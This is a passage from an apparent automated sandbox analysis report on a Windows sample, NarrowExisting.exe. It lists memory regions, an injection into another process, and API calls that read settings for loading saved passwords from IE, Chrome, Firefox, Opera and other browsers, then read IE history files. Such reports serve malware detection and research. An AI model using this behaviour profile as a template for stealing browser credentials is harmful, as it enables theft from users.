| private_0x0000000002070000 | 0x02070000 | 0x0216ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x02270fff | Private Memory | Readable, Writable |
|
|
|
- |
| nss3.dll | 0x02170000 | 0x02321fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022c0000 | 0x022c0000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x024fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002500000 | 0x02500000 | 0x028f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| freebl3.dll | 0x73980000 | 0x739cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp100.dll | 0x739d0000 | 0x73a38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x73a40000 | 0x73afdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nss3.dll | 0x73b00000 | 0x73cb4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| freebl3.dll | 0x73e70000 | 0x73ebefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x73e90000 | 0x73ea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pstorec.dll | 0x73eb0000 | 0x73ebcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x73ec0000 | 0x73ec8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x73ed0000 | 0x73f53fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x74470000 | 0x74496fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74710000 | 0x7474afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x74a40000 | 0x74a56fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x74a60000 | 0x74a86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x74a70000 | 0x74a86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mozglue.dll | 0x74a90000 | 0x74ab1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wsock32.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winmm.dll | 0x74ad0000 | 0x74b01fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| vaultcli.dll | 0x74b10000 | 0x74b1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x75210000 | 0x7528afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x75890000 | 0x75894fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x7efde008, size = 4 |
|
1 | |
| Modify Memory | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | address = 0x7efdf010, size = 4 |
|
1 | |
| Modify Control Flow | #14: c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 0x664 | os_tid = 0xb60, address = 0x0 |
|
1 |
Threads
Thread 0xb60
541
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x73ed0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x73ed6be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x758c0468 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting_lng.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
18 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
22 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
11 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
15 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
53 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 256, size_out = 256 |
|
1 | |
